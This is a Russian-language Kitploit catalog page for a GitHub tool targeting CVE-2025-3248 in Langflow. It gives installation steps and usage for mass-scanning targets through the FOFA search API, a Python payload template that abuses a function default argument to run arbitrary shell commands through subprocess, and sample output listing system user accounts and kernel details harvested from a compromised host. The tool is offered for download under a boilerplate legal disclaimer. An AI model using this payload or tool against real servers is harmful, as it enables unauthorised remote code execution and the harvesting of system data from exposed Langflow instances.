Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-3248 — Сканер уязвимостей для CVE-2025-3248 в приложениях Langflow. Инструмент для сканирования уязвимости CVE-2025-3248 в приложениях Langflow. | Kitploit
Инструменты/GitHubGitHub/xuemian168/cve-2025-3248
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииКомандование и Управление
GitHubxuemian168/cve-2025-3248

CVE-2025-3248

Сканер уязвимостей для CVE-2025-3248 в приложениях Langflow. Инструмент для сканирования уязвимости CVE-2025-3248 в приложениях Langflow.

Репозиторий
10211 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

中文 | Английский

Сканер уязвимостей Langflow

Сканер уязвимости CVE-2025-3248 в приложениях Langflow.

Возможности

  • Сканирование одной цели или нескольких целей с помощью FOFA
  • Выполнение системных команд на уязвимых целях
  • Получение информации о системе
  • Поддержка пользовательских полезных нагрузок (payload)
  • Индикатор прогресса для сканирования через FOFA
  • Красивый CLI-интерфейс

Установка

  1. Клонируйте репозиторий:
root@kitploit:~
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
  1. Установите зависимости:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
  1. Отредактируйте файл окружения (опционально)
root@kitploit:~
# После завершения редактирования
mv .env.example .env

Использование

Сканирование одной цели

root@kitploit:~
python main.py -t https://target.com

Использование API FOFA

root@kitploit:~
python main.py --fofa-email [email protected] --fofa-key your_api_key

Дополнительные параметры

  • -t, --target: URL цели для сканирования
  • --fofa-email: Email для API FOFA
  • --fofa-key: Ключ API FOFA
  • --fofa-query: Поисковый запрос FOFA (по умолчанию: 'app="LOGSPACE-LangFlow"')
  • --country: Фильтр результатов по коду страны (например, CN, US)
  • --max-pages: Максимальное количество страниц FOFA для загрузки (по умолчанию: 5)
  • --page-size: Результатов на страницу (по умолчанию: 100)
  • --timeout: Тайм-аут запроса в секундах (по умолчанию: 10)
  • --no-verify: Отключить проверку SSL
  • --threads: Количество потоков для параллельного сканирования (по умолчанию: 5)
  • -f, --file: Пользовательский Python-файл, используемый в качестве полезной нагрузки

Пользовательские полезные нагрузки

Вы можете создавать собственные полезные нагрузки, создав Python-файл:

root@kitploit:~
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
    pass

Затем используйте его с помощью:

root@kitploit:~
python main.py -t https://target.com -f your_payload.py

Пример вывода

root@kitploit:~
    [+] Учётные записи пользователей:
        root            UID:0      GID:0      Home:/root                Shell:/bin/bash
        daemon          UID:1      GID:1      Home:/usr/sbin            Shell:/usr/sbin/nologin
        bin             UID:2      GID:2      Home:/bin                 Shell:/usr/sbin/nologin
        sys             UID:3      GID:3      Home:/dev                 Shell:/usr/sbin/nologin
        sync            UID:4      GID:65534  Home:/bin                 Shell:/bin/sync
        games           UID:5      GID:60     Home:/usr/games           Shell:/usr/sbin/nologin
        man             UID:6      GID:12     Home:/var/cache/man       Shell:/usr/sbin/nologin
        lp              UID:7      GID:7      Home:/var/spool/lpd       Shell:/usr/sbin/nologin
        mail            UID:8      GID:8      Home:/var/mail            Shell:/usr/sbin/nologin
        news            UID:9      GID:9      Home:/var/spool/news      Shell:/usr/sbin/nologin
        uucp            UID:10     GID:10     Home:/var/spool/uucp      Shell:/usr/sbin/nologin
        proxy           UID:13     GID:13     Home:/bin                 Shell:/usr/sbin/nologin
        www-data        UID:33     GID:33     Home:/var/www             Shell:/usr/sbin/nologin
        backup          UID:34     GID:34     Home:/var/backups         Shell:/usr/sbin/nologin
        list            UID:38     GID:38     Home:/var/list            Shell:/usr/sbin/nologin
        irc             UID:39     GID:39     Home:/run/ircd            Shell:/usr/sbin/nologin
        _apt            UID:42     GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        nobody          UID:65534  GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        user            UID:1000   GID:0      Home:/app/data            Shell:/bin/sh
root@kitploit:~
    [+] Сведения о системе:
        Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux

Отказ от ответственности

⚠️ Отказ от ответственности Данный инструмент предназначен только для законных целей. Он разработан для образовательных целей, внутреннего тестирования безопасности предприятия или использования в авторизованных средах. Строго запрещается использовать этот инструмент на любых несанкционированных системах, сетях или устройствах, иначе это может нарушить соответствующие законы и нормативные акты.

Пользователи несут всю юридическую ответственность за свои действия. Автор и участники не несут ответственности за любые потери, утечку данных или правовые последствия, вызванные неправильным использованием этого инструмента.

⚠️ Не используйте для нелегальных атак. Не пытайтесь развернуть или запустить этот инструмент на несанкционированных системах.

Ссылки

  • https://github.com/langflow-ai/langflow/releases/tag/1.3.0
  • https://github.com/langflow-ai/langflow/pull/6911
  • https://www.cve.org/cverecord?id=CVE-2025-3248

Лицензия

MIT License

Скачать инструмент